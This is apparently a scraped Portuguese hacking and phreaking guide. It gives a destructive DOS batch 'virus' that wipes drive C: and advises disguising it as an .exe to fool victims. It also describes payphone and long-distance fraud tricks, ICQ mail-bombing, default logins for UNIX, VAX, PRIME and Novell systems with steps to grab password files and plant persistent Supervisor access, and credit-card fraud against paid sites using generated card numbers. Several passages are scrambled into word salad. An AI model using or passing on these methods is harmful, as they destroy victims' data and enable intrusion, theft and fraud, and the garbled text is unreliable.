Académique Documents
Professionnel Documents
Culture Documents
O que um Hacker ? Tudo isto que vocs pensam dos Hackers foi criado possivelmente
com a publicidade gerada pelos filmes que tratam do assunto, como: Jogos de Guerra e
agora com os mais recentes A rede e Hackers. Esses filmes colocam o hacking de uma
forma absurda. Pois o quase impossivel fazer o que eles fazem. E isso faz com que a
pessoa pense que os hacker so criminosos perigosos.
So aqueles possuem muitos, seno todos, os conhecimentos acima! Isso no uma
regra, mas no usam para os mesmos propsitos e as vezes auxiliam os prprios
tcnicos em segurana e os webmasters a proteger seus sistemas.
So de uma inteligncia e determinao muito superiores a de uma pessoas comuns,
pois eles so capazes de passarem semanas ou at mesmo meses lendo e aprendendo de
um novo sistema, apenas com o propsito de saber e utilizar esses sistemas. Compram
livros sobre os assuntos que procuram aprender.
Um Hacker, um sabicho. Justamente por saber muito, ele tem condies de
"aprontar" por a. O Hacker sempre quer aprender mais um pouco e normalmente acaba
perdendo horas de sono por isso. aquele que tem prazer em sentar em frente de seu
micro e ficar horas e horas buscando aquilo que precisa.
Naturalmente xereta, o Hacker adora invadir sistemas alheios para simplesmente
preencher seu ego. Muitas de suas faanhas podem ser discutveis ao nvel social, mas o
verdadeiro Hacker no costuma estragar nada, subtrair programas, ou sequer roubar
informaes em detrimento de outrem. O Hacker , acima de tudo, um intelectual
informatizado.
O que Hacking ?
Hacking o ato de penetrar em sistemas de computadores para ganhar mais
conhecimento e entender como seu funcionamento. Em portugus hack significa corte,
entalhe. Ou ento fuador.
Por qu Hack ?
Como j foi dito anteriormente, o hack feito para a aprimorar os conhecimentos de
uma pessoa em relao a um sistema de computadores. Hackers no destroem, no
roubam e nem espionam informaes por dinheiro.
Diferena entre Hackers e Crackers ?
Os Crackers so os que a imprensa confunde com os hackers, so aqueles que invadem
sistemas com o propsito de roubar programas ou simplesmente apag-los, so
inteligentes, porm, em sua maioria, prepotentes, pois deixam mensagens do tipo: "Eu
sou o melhor ! Apaguei e escapei !"entre outras, deixando na maioria das vezes um
rastro que possibilita sua captura. Possuem co- nhecimentos semelhantes aos phreaks
mais com propsitos um pouco mais destrutivos. Um exemplo recente foi a priso de
Kevin Mitnick, o "ladro(?) ciberntico mais procurado da histria, capturado pelo FBI
com a ajuda do Tsutomu Shimomura, o tcnico de segurana mais respeitado da histria
(?).
Um Cracker o que utiliza de suas habilidades em proveito prprio, no importando
quantos ou quais prejuzos vai causar. Este um elemento perigoso, que muitas vezes
acaba por se auto-destruir. Normalmente coloca vrus em computadores, descobre
senhas para vender a empresas, destri informaes, corrompe sistemas e apronta tudo
que pode
Regras Hackers:
<STRONG- Nunca destruir nenhum sistema. < strong>
<STRONG- Nunca nenhum < strong alterar dos arquivos do sistema, no ser que seja
necessrio para esconder presena ou garantir a sua entrada posteriormente.>
<STRONG- < strong No compartilhe seus projetos hackers, com ningum>
<STRONG- < strong no ser que seus projetos Em uma BBS, aconselhvel voc
discuta hackers. BBS?s podem monitoradas pelo governo.>
<STRONG- Nunca < strong ou uma d nomes telefones reais em BBS.>
<STRONG- Nunca < strong que voc em deixe seu apelido um sistema entrou.>
<STRONG- < strong No em entre computadores governamentais.>
<STRONG- Nunca < strong do sua seus com converse sobre planos hackers outra
pessoa telefone de casa.>
<STRONG- < strong em seu um Seja atento. Mantenha todo o material hacker lugar
seguro.>
<STRONG - < strong voc um hacker Para se tornar verdadeiro deve simplesmente
praticar.>
Por onde comear ?
Comee com sistemas pequenos como em universidades. Depois passe para redes
maiores como telenet. A telenet altamente recomendada para novatos, pois ela tem um
sistema de segurana muito vago. So milhares de conexes ao mesmo tempo, o que
torna praticamente impossvel a monitorao de um usurrio no caso, voc !
Nesta seo do o CALOI, voc vai aprender a fazer um vrus muito facilmente. Ele
feito no Edit do DOS e o procedimento ser muito simples... Fazendo o Vrus
Para fazer, entre no Edit do DOS e crie um arquivo .bat e neste arquivo digite:
ECHO ECHO OFF ECHO Y | del c:\*.* cls ECHO j era otario!!! Seu c: nao existe
mais!
Depois de digitar salve o arquivo e logo em seguida, voc vai precisar de um
compilador de arquivos de .bat para .exe porque no Edit, ele vai salvar o vrus como .bat
!! Se o cara rodar o arquivo .bat, o vrus funciona do mesmo jeito mas se ele estiver
em .exe voc pode dar uma desculpa dizendo que algum programa e quando o cara
rodar, ele se fode !!!
Importante: Se o windows do cara for na verso em portugus, mude o "Y" para "S".
Descrio dos comandos:
ECHO OFF => Apaga as linhas do comando ECHO Y | del c:\*.* => Deleta o c:\*.* cls
=> Limpar ECHO j era otario!!! Seu c: nao existe mais! => Mensagem que vai
aparecer quando ele rodar o arquivo...
Phreaker:
BURLANDO CELULARES Esta dica muito boa, uma dica para celulares, mas
tenho uma ligeira preteno que em telefones comuns ele chegue a reduzir em 70% a
tarifa telefonica (S que no garantido). Para isso basta que voc pegue o numero a ser
discado, exemplo: 65 - 93 - 42 (um numero inventado), voc pega o ltimo digito e o
subtrai de dez, no caso do exemplo o 2. 10 - 2 = 8, ento, coloque o 8 na frente do 2 que
ficar assim: 65 93 48 2 , agora sem pagar.
Primeiro, pegue o nmero que voc vai discar.
Exemplo: 123-4567
Devemos pegar o ultimo nmero do telefone a ser discado, no caso o 7... Subtraimos ele
de 10, o que vai resultar o numero 3. Somente vamos acrescentar o nmero 3 ao final do
numero discado. O resultado vai ficar: 123-4567-3
LIGANDO EM ORELHES CARTO SEM PAGAR
Truque com o carto:
Enganando o telefone publico
Bote o carto , assim que a pessoa falar ALOW! segure o numero 9 e retire o carto,
fique segurando o numero 9 at acabar de falar!
Grafite
O grafite um material super condutor que conduz energia, e o carto funciona assim,
ele tem uns 50 fuziveiszinhos, cada ligao gasta ele queima um fuzivel, ento o nosso
amigo grafite que condutor de eletricidade, no deixa queimar os fuziveis ento faa o
seguinte atras do carto,(na parte cinza) rabisque-a com fora e ,bote no telefone
publico e pronto ,mas lembre-se rabisque com fora!
Esmalte de unha incolor
O esmalte impede que esses fuziveis queimem, faa tambm esse com os cartoes de
video game(divertilandia)! Passe esmalte na parte de traz do carto ,e no de video game
passe na parte da fita magntica! Se voc sabe mais uma dica mande para mim! pode ter
seu nome e seu e-mail aqui!
Pegue o carto telefonico zerado dai bote ele de molho na gua candida (com sal ou
pode se comprar em uma farmcia qualquer), depois de 3 ou 4 dias a tinta do carto vai
sair , depois pegue papel aluminio e cubra as partes metalicas com o papel alumi , dai as
ligaoes viraro infinitas!
Esta dica pode lhe poupar algumas fichas. Antes de mais nada bom lembrar que esta
dica para aqueles telefones antigos (os vermellhos). Vamos a dica. Pense em um
numero qualquer ex, 65 9342 (Se voc leu a dica anterior deve se lembrar), ento voc
devera subtrair cada digito de 10. No caso vai ficar 45 1768. Agora tecle o numero e
bata no bocal do telefone o numero de vezes de acordo com o novo numero. Ento voc
tera ligaes gratutas. Tem muita revista por ai falando sobre isso, mas nada do que
eles poe na revista funciona! Ai vai uma que e testada e aprovada, funciona mesmo!
bem simples, qualquer orelhao a cartao aceita isso:
<STRONG- < strong do a pessoa o Ponha cartao ligue normalmente 2- Quando atender
aperte 0 (zero) e segure. 3- Pronto agora suas fichas (unidades cartao) nao vao cair
mais!>
OBS: Nao solte o dedo do zero se no as fichas vo voltar a cair.
Esta dica para voc poder discar de um telefone sem usar as teclas. Por exemplo,
assim voc vai poder ligar de um telefone com cadiado ou mesmo se as teclas do seu
quebraram hehehe. Bem ento mos a obras, pra voc "discar" sem usar as teclas
muito simples basta que voc pegue aqueles trecos que indentificam se o telefone est
fora ou no do gancho. Bom agora basta que voc pressione o negcio de acordo com o
digito por exemplo, se o digito for 2 aperte rapidamente duas vezes. Se for 3 aperte trs
vezes e assim vai... A cada numero de um pequeno intervalo para que ele reconhea o
numero. Mas porque isso ocorre?! Bem cada vez que voc tira o telefone do gancho ele
libera um impulso telefonico, estes impulsos so aqueles barulinhos que voc escuta
quando teclar qualquer coisa. Ento ao pressionar o gancho vai se seguir o mesmo
principio, portanto voc tem que pressionar determinadas vezes de acordo com o
numero.
Isto aqui vai lhe poupar uma nota, mas aconselho a voc no fazer testes em vo, pois
se no funcionar... hehehehe, vc vai pagar uma nota preta! Bem o numero que seria
discado normalmente seria: 316 433 9418, como pro EUA voc digitaria 01 na frente
(Codigo Internacional do EUA) o numero passa a ser 01 316 433 9418 (Ainda no
disque!) bem oque agente vai fazer enganar o computador da EMBRATEL, para isso
voc vai digitar 0008 antes. Digite rapidamente 0008 01 316 433 9418. Ao digitar o 1
zero voc estar iniciando um codigo de um pais normalmente, quando voc digita o 2
zero o computador vai iniciar uma busca pelo codigo e vai descobrir que o nmero no
existe ento antes que d mensagem de erro digite o terceiro zero a esta altura os
computadores vo se complicar com os trs zeros que voc digitou e ficaram loucos, ao
digitar o oito voc mostra aos computadores (que esto mais loucos do que qualquer
coisa) que quer fazer uma ligao internacional ento o 01 dar o codigo internacional a
ser discado, como pode ser qualquer outro, e o n o destino do telefonema. Se der
certo voc vai pagar apenas o impulso normal.
Faca a ligacao com o numero desejado!
Ex: 555-6766
para discar o
<STRONG < strong aperte (aperte 5 cinco 7 sete botao) 6 ( seis vezes aquele botao )>
Voc deve estar se perguntando, mas se tiver um zero como eu fao? Perg: No aperto
nada? Resp: No, aperte dez vezes aquele botao! ;
Obs: Tem que ter um intervalo de 1 a 2 segundos entre os apertos!
Obs2: "aquele boto" o boto do gancho, onde voce desliga!
Atacando o ICQ:
Usando seu mailbomber para bombear o ICQ : O icq permite que voc possa mandar emails para outros usurios. Ento vamos aproveitar disso para bombardear um outro
usurio um mailbomb. O mailbomb manda diversas mensagens para o e-mail da vitima,
isso exatamente o que vamos fazer!! Enviar um monte de mensagens para o icq de um
usurio. Tudo que voc vai precisar de um programa de mail bomb e o UIN ( n do icq
) da vitima mas no necessario que voc tenha essa pessoa na sua lista. Coloque seu email bomb para bombear... Isso bem simples. "Uin da vtima@pager.mirabilis.com"
Exemplo: 123456@pager.mirabilis.com
O cara vai ser bombeado exatamente como faz um mail bomb !! Na verdade essa
tecnica faz exatamente o que faz o "icq bomber" faz. Porm, talvez seja mais rpido...
( Bem melhor )
All IP adress
|--RULE TYPE--| |----LOCAL PORT SELECTION-----|
|Allow in| |all ports| |allow out| |single port| |disallow in| |ports from "1000" to "7000"| |
disallow out|
--------------------------------------------------------------|--PROTOCOL--| |----REMOTE PORT SELECTION----|
|tcp/ip| |all port| |udp| |single port| ---------- |ports from "1000" to "7000"|
--------------------------------------------------------------Visulizao das configuraes do programa :
Configure um novo rule list assim e pronto! Voc no receber mais aqueles montes de
mensagens pentelhas do flooder e do ickiller!
Mail bombing :
Para se defender desse problema muito fcil! O mailbombing de icq utiliza um sistema
chamado mailexpress. Quando te bombardeiam, voc recebe vrias mensagens de email de icq, ento ns iremos cancelar o recebimento desse tipo de mensagens.
Para isso abra o ICQ, v no menu e ento em security & privacity.
Uma nova janela ir se abrir. Entre na seo de ignore list e selecione a opo: "Do not
accept mailexpress messages". E salve as alteraes.
Pronto! Voc nunca mais ser bombeado dessa maneira. Quando as pessoas irem em seu
info, no aparecer mas o seu IP.
Encontrando sistemas:
Encontrando o Sistema
Para encontrar um computador com o sistema, voc deve procurar pelas linhas com um
programa chamado War Dialer, ou se conectar via Telnet ou outro sistema de
interligao de computadores. War Dialer: VMB Hacker (40,7k)
Sistemas UNIX
<STRONG. < strong sistema, que a com voc um sistema de Para deve e 6 Entrando no
entrar ?login?, 1 dgitos password pode ter 8 dgitos. Dai tem trs sadas:>
Ex.: fou:123abc45:6789:10:Ricardo
Gomes:/home/dir/fou:/bin/fou
Username: fou
Encrypted Password: 123abc45
User Number: 6789
Group Number: 10
Other Information: Ricardo Gomes
Home Directory: /home/dir/fou
Shell: /bin/fou
Esse arquivo muito provvelmente estar encriptado. O password estar escondido e,
sem um programa para decript-la, a lista ser intil. O programa de decriptao do
password UNIX, trabalha em cima de um .dicionrio pr moldado, comparando as
palavras com o texto encriptado. bom lembrar que o Brute Force no ir decriptar a
lista. Ele ir tentar comparar palavras encriptadas por uma lista de nomes com a lista de
passwords. Quando ele encontrar semelhanas (ex. duas palavras iguais com a mesma
decriptao) ele para e d a lista pronta. Brute Force (14,4k) Dictionary Maker (7,73k)
Antes de usar o programa decriptador que no d certeza de sucesso, tente encontrar um
login sem password pois assim, voc s precisar digitar o login para entrar no sistema.
Ex.: fou::6789:10: Ricardo Gomes:/home/dir/fou:/bin/fou
Depois da lista de passwords, pegue os seguintes arquivos: /etc/group - a lista de
newsgroups e seus passwords tambm encriptados. sintaxe groupname:password:group id:users in group /etc/hosts - a lista de hosts conectados
ao sistemas. til quando a conexo via telenet ou rlogin. /usr/mail/ - onde esto
guardadas as mensagens de cada usurio.
Sistema VAX/VMS
Para entrar no sistema VAX/VMS, voc deve proceder da mesma maneira que fez no
UNIX: Arrume a lista de passwords, entre com o login de algum ou tente os defaults
Username: ..Password:
system .....operator
system .....manager
system .....system
system .....syslib
operator ...operator
systets ....uetp
systest ....systest
systest ....test
sysmaint ...sysmaint
sysmaint ...service
sysmaint ...digital
field ......field
field ......service
guest ......guest
guest ......sem password
demo .......demo
demo .......sem password
test .......test
decnet .....decnet
Dentro do sistema no h muito o que fazer. Voc pode tentar pegar a lista de passwords
em:
SYS$SYSTEM:SYSUAF.DAT, mas normalmente, ela no est disponvel para os
usurios Tome muito cuidado quando tentar quebrar o sistema VAX's, pois ele guarda
todos os bad logins e bad passwords, podendo rastre-lo na sua prxima tentativa. Se
voc quiser mesmo tentar, entre com alguns passwords em um dia, espere e tente
novamente no dia seguinte...
Sistema PRIME
Ao entrar no sistema PRIME voc dever fazer as mesmas coisas que fez no UNIX e no
VAX's.
Username: ..Password:
prime ......prime
primos .....primos
primos .....prime
primos_cs ..prime
primos_cs ..primos
primenet ...primenet
system .....system
system .....prime
system .....primos
netlink ....netlink
test .......test
guest ......guest
guest1 .....guest
Rede Novell
1. Entrando no Sistema - Para quebrar a rede Novell voc deve utilizar os mesmos
recursos que usou para entrar nos sistemas UNIX ou VAX's. Na Novell voc tambm
pode tentar alguns defaults. Os defaults da rede Novell so usados para a conexo com
portas externas como impressoras, fax e etc..., todos sem password. Abaixo esto alguns
defaults:
Login:
superior
guest
admin
user_template
print
laser
hp_laser
printer
laserwriter
post
mail
gateway
gate
router
backup
wangtek
fax
faxuser
faxworks
test
archivist
chey_archsvr
windows_passthru
Se voc conseguir entrar com esses defaults, voc pode conseguir a lista com os logins
verdadeiros fazendo o seguinte: v ao diretrio SYS:PUBLIC, digite SYSCON e d
enter. Ento v a User Information e veja a lista com todos os logins desse servidor.
Esses logins s podero ser utilizados se estiverem sem password, pois a lista s mostra
os nomes. Nunca tente chutar o password de um usurio, pois o computador armazena o
numero de vezes que uma senha foi digitada errada e manda para o usurio verdadeiro
quando ele se conecta. Esse sistema de segurana se chama Intruder Detection. Se voc
no conseguir entrar com esses logins, faa o seguinte: no prompt do DOS digite NETX
ou VLM, para rodar a rede TSRs e escreva CX /T /A /R. Com isso voc, provavelmente
conseguir a lista dos usurios.
<STRONG. dos do que para ou com uma voc seu um sistema de o Para e no
password pode tem
<STRONG. dos com uma voc de o Para deve
super.zip (31,3k)
Esse programa foi escrito exatamente para deixar o usurio desligar e ligar o acesso
Supervisor na hora que quiser. Faa ento o seguinte:
Consiga aceso Supervisor com o nw-hacker; Ligue sua conta para supe equivalency
com o super.exe; Se voc ganhar acesso Supervisor, d supe equivalency a algum dos
defaults (Guest, test, archivist, chey_archsvr...); Saia e entre na rede com o default que
voc deu a supe equivalency e ligue o acesso Supervisor com o super.exe; Saia e entre
novamente com o login que voc utilizou primeiro; Remova o acesso Supervisor. Agora
o default que voc escolheu pode ser ligado e desligado por voc, na hora que voc
quiser para ter acesso Supervisor
Passwords
Se no houver outro jeito e voc precisar chutar os passwords, chute com inteligncia e
no v comeando: aaa, aab, aac, aad e etc. Os passwords mais utilizados aqui no Brasil
so:
Times de futebol;
Telefone;
Sobrenome;
Nome de computadores (pentium, ibm, etc so encontrados com frequncia);
Apelidos;
Nome de pessoas famosas;
Passwords de teclas seguidas. Ex.: qwerty, asdfgh, zxcvbn ou aaa, bbb, ccc.
O usurio que usa desse tipo de password no pensam hackers quebrando sua senha e
sim na velocidade para dar login. Por isso, quando voc escolher seu password, faa
uma mesclagem de letras e nmeros. Ex. mouse/1997 - m1o9u9s7e. Parece bvio, mas
ningum vai chutar um password desse tipo quando tentar quebrar seu login.
E-mail
Nesta sesso voc encontrar arquivos para enviar e-mails bombs, e-mail sem remetente
e os famosos PGPs. Unabomb (59,9k) Para bombear o e-mail de algum. Upyours 3.0
(+-2Mb) Link para o melhor programa de e-mail bomb Anonimail (71,3k) Para enviar
e-mails annimos AEgis Shell for PGP (2,6Mb) Link para um dos melhores programas
de encriptao
Se voc quiser enviar um E-Mail para Usenet, mande a mensagem para
@, por exemplo.
Grupo: fou.morais
Gateway: news.demon.co.uk
Endereo: fou.morais@news.demon.co.uk
Abaixo est uma lista com alguns gateways:
group.name@news.demon.co.uk
group.name@charm.magnus.acs.ohio-state.edu
group.name@undergrad.math.uwaterloo.ca
group.name@nic.funet.fi
group.name.usenet@decwrl.dec.com
Para escrever essa sesso, foram tomados como base os seguintes documentos:
The PC Hacking FAQ Por: Olcay Cirit
BASIC NETWORKING Por: Sk8 The SkinHead
alt.2600 FAQ, Beta 013 Por: Vrios Autores
Obtendo acesso gratuito a sites de sexo: Ultimamente, conseguir umas boas fotos XXX
via WWW est muito difcil. A venda de material pornogrfico (fotos, vdeos, show de
strip...) se tornou um negcio muito lucrativo e muitos webmaster j esto explorando
este novo meio de fazer dinheiro. Mas, na minha opinio, estes sites deveriam ser livres,
ou seja, como programas sharewares: se voc gostar do servio paga uma quantia pr
estipulada pelo administrador do sistema. Mas como nem tudo perfeito devemos
apelar. Conseguir acesso gratuito a estes sites pagos no muito difcil e no requer
nenhuma habilidade.
<STRONG < strong no ser que a com um de o se e vai servidor acesso Passo:
Primeiramente preciso escolher maneira tipo fraudado. Existem dois servidores: difceis
obter acesso, menos arriscados) instantneo (mais fceis, porm, bem mais arriscados).
Qualquer destes tipos servidores envolve fraude nmeros cartes crdito.>
No primeiro tipo de servidor, o esquema fazer tentativas com diversos nmeros de cc's
at que o servidor aceite um destes nmeros. um mtodo bastante entediante mas a
maioria dos sites pornogrficos funciona desta maneira. Em alguns, ainda, voc se
cadastra e s depois de alguns dias que chega a resposta de seu pedido, resposta esta
quase sempre negativa pois so pessoas que verificam a autenticidade do carto de
crdito.
No segundo tipo de servidor o negcio fica mais interessante. A maioria dos sites com
acesso instantneo grava o endereo ip das pessoas que se cadastram, com isso
possvel saber da onde vem aquele ou este fraudador. Se voc se cadastrar com um
nmero de carto falso, o site faz uma pesquisa, descobre o seu provedor de acesso e
entra em contato com ele na mesma hora, detonando voc direitinho. O nico jeito seria
voc trocar o seu endereo ip, o que perfeitamente possvel.
Existe um servio perfeito com esta funo: ANONYMIZER. Neste site possvel que
voc troque o seu ip por um outro qualquer, deste modo, voc navega por pginas
WWW com um ip emprestado. Se voc quiser fazer um teste, abra essa URL do site
Amateurs Hardcore (www.amateurs. com). V at a pgina de cadastro instantneo,
preencha os campos com dados falsos (inclusive o seu e-mail) e, onde aparecem campos
pedindo nmero de carto de crdito, data de validade, tipo..., preencha com os dados
fornecidos por um dos programas geradores de nmeros de CC's.
Aps escolher a sua senha e o seu username, voc est pronto para fazer o download de
vrias fotos e vdeos XXX.
Importante:
Nunca use a sua senha falsa mais de duas vezes, muito arriscado.
Nunca visite o site fraudado sem antes passar pelo anonymiser.
O mtodo no 100% seguro, o site fraudado pode pedir os logs do anonymiser e
descobrir voc.
Fraude envolvendo cartes de crdito constituem crime federal e se voc for menor de
idade, seus pais pagaro por voc.
Todo o risco por sua conta.